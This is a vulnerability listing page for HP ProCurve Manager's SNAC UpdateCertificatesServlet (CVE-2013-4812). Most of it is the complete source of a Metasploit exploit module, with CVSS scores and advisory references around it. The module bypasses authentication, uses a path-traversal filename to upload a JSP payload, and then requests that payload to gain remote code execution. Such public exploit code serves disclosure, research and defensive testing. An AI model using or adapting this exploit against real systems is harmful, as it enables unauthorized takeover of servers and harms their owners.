HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload

2013.09.17
Credit: Juan vazquez
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload', 'Description' => %q{ This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary files, just having into account binary writes aren't allowed. Additionally, authentication can be bypassed in order to upload the file. This module has been tested successfully on the SNAC server installed with HP ProCurve Manager 4.0. }, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-4812' ], [ 'OSVDB', '97155' ], [ 'BID', '62348' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'HP ProCurve Manager 4.0 SNAC Server', {} ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'SSL' => true, }, 'DisclosureDate' => 'Sep 09 2013')) register_options( [ Opt::RPORT(443) ], self.class ) end def check session = get_session if session.nil? return Exploit::CheckCode::Safe end res = send_request_cgi({ 'uri' => "/RegWeb/RegWeb/GetCertificateStatusServlet", 'cookie' => session }) if res and res.code == 200 and res.body =~ /"success":"true"/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def get_session res = send_request_cgi({ 'uri' => "/RegWeb/html/snac/index.html" }) session = nil if res and res.code == 200 session = res.get_cookies end if session and not session.empty? return session end return nil end def exploit_upload(session) jsp_name = "#{rand_text_alphanumeric(8+rand(8))}.jsp" rand_password = rand_text_alpha(4 + rand(10)) post_message = Rex::MIME::Message.new post_message.add_part(payload.encoded, "application/x-pkcs12", nil, "form-data; name=\"importFile\"; filename=\"\\../#{jsp_name}\"") post_message.add_part(rand_password, nil, nil, "form-data; name=\"importPasswd\"") post_message.add_part("{\"importPasswd\":\"#{rand_password}\"}", nil, nil, "form-data; name=\"cert_data\"") post_message.add_part("importCertificate", nil, nil, "form-data; name=\"cert_action\"") data = post_message.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { 'uri' => "/RegWeb/RegWeb/UpdateCertificatesServlet", 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_message.bound}", 'cookie' => session, 'data' => data, }) if res and res.code == 200 and res.body =~ /Certificate import fails/ return jsp_name end return nil end def peer return "#{rhost}:#{rport}" end def exploit print_status("#{peer} - Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end print_status("#{peer} - Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end end

References:

http://www.zerodayinitiative.com/advisories/ZDI-13-225/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top